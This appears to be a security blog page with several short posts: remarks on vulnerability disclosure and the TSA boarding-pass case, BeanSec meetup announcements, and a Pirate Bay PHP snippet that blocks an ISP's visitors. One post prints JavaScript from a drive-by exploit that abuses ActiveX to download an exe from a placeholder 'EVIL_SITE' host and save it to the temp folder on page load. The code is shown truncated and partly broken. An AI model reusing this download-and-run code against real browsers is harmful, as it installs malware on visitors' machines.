More commentary on the TSA Security Theater

Bruce Schneir is a security critic, businessman and all star crypto-expert who has been following the “boarding pass hacker” story. In a recent NYT article he offers the following on disclosure and I think it maps quite nicely to what I’ve been considering for the vulnerability research paper I’ve been helping out on.

” ‘Why should we help the bad guys?’ The answer, he said, is that the bad guys aren’t helped — because they almost certainly already know a system’s weak points — and that disclosing the weaknesses brings pressure on government agencies and their suppliers to improve security for the good guys.”

This NYT article is a little behind since the issue occured and blew over a while back. Even I have posts on this and my blog is hampered constantly by an overwhelming workload. I am glad to see that *some* public scruntity has come around to this case. The MA senator who called down the government on Christopher Soghoian seems woefully absent in the article but I just assume that is what politics are all about. To be fair Ed Markey (D – Mass) did reverse himself.

“Rogues are very keen in their profession, and know already much more than we can teach them.” — A.C. Hobbs

Interesting Web Exploit Technique

Today I found another old example of how web site operators are using browser based exploits to infect “drive by” browsers. If a user goes to the site I found today using a vulnerable browser an Iframe will deliver an advertisment which contains javascript encoded download instructions for exe’s.


function Go(a) {
Log('Creating helper objects...');
var s = CreateO(a, "WScript.Shell");
var o = CreateO(a, "ADODB.Stream");
var e = s.Environment("Process");

Log('Ceating the XMLHTTP object...');
var url = "http://EVIL_SITE/adv/168/win32.exe"; var xml = null;
var bin = e.Item("TEMP")+ "\\" + "metasploit.exe";
var dat;

try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");

if (! xml) return(0);

Log('');"http://EVIL_SITE/adv/GET", url, false)
dat = xml.responseBody;

o.Type = 1;
o.Mode = 3;
o.SaveToFile(bin, 2);


function Exploit() {
var i = 0;
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}',

while (t[i]) {
var a = null;

if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}

if (a) {
try {
var b = CreateO(a, "WScript.Shell");
if (b) {
Log('Loaded ' + t[i]);
} catch(e){}
<body onload='Exploit()'>

document.write(unescape("[LARGE BLOCK OF HEX ENCODED DATA]"))

BeanSec! December 20th 6-9pm…

We’ve now established a regular schedule for the BeanSec! events; the third Wednesday of each month. So you can mark your calendars now for December 20th at 567 Massachusetts Ave. Upstairs at the Enormous Room from 6-9pm.

For the uninitiated:

BeanSec! is an informal meetup of information security professionals and academics in the Cambridge/Boston area. Unlike other meetings, you will not be expected to pay dues, “join up”, present a zero-day exploit, or defend your dissertation to attend.

The location is the Enormous Room (map) in Cambridge.

pirate bay strikes back

I found this to be a unique form of protest by Swedish site The Pirate Bay. they are opposing the tactic of a swedish isp who has decided to block it’s customers from accessing I won’t go into a long diatribe about the merits of imposing restrictions on your customers. I will however share the code that The Pirate Bay has provided to help sites block anyone coming from Perspektiv Bredband.

This is a unique form of protest in that if enough sites fought back with this methodology (essentially a kill file) then customers of the service would eventually leave and force the ISP to reconsider it’s stance. It’s simply a brilliant methodology.

if (get_perspektiv_ban(getenv("REMOTE_ADDR"))) { Header("Location:; exit; }

function get_perspektiv_ban($iip) {
$a=explode(".", $iip);
$ip=str_pad(decbin($a[0]), 8, "0", STR_PAD_LEFT).str_pad(decbin($a[1]), 8, "0", STR_PAD_LEFT).str_pad(decbin($a[2]), 8, "0", STR_PAD_LEFT).str_pad(decbin($a[3]), 8, "0", STR_PAD_LEFT);


while (list(, $value) = each($match)) {
$c=explode("/", $value);
$b=explode(".", $c[0]);
$net=str_pad(decbin($b[0]), 8, "0", STR_PAD_LEFT).str_pad(decbin($b[1]), 8, "0", STR_PAD_LEFT).str_pad(decbin($b[2]), 8, "0", STR_PAD_LEFT).str_pad(decbin($b[3]), 8, "0", STR_PAD_LEFT);

if (!strncmp($ip, $net, $c[1])) {
return 1;
return 0;

digg mirror of the story

Beansec now on a regular schedule

Andy J had a really good point. Beansec was just too unpredictable to make plans for and our erratic releases of information were just a little *too* spontaneous. So to appease him and the good folks at Matasano The Chris’ and I have decided that all future Beansec events will occur on the Third Wednesday of the Month.

That’s right, every third Wednesday. So you can mark your calendars now for December 20th at 567 Massachusetts Ave Upstairs at the Enormous Room from 6-9pm.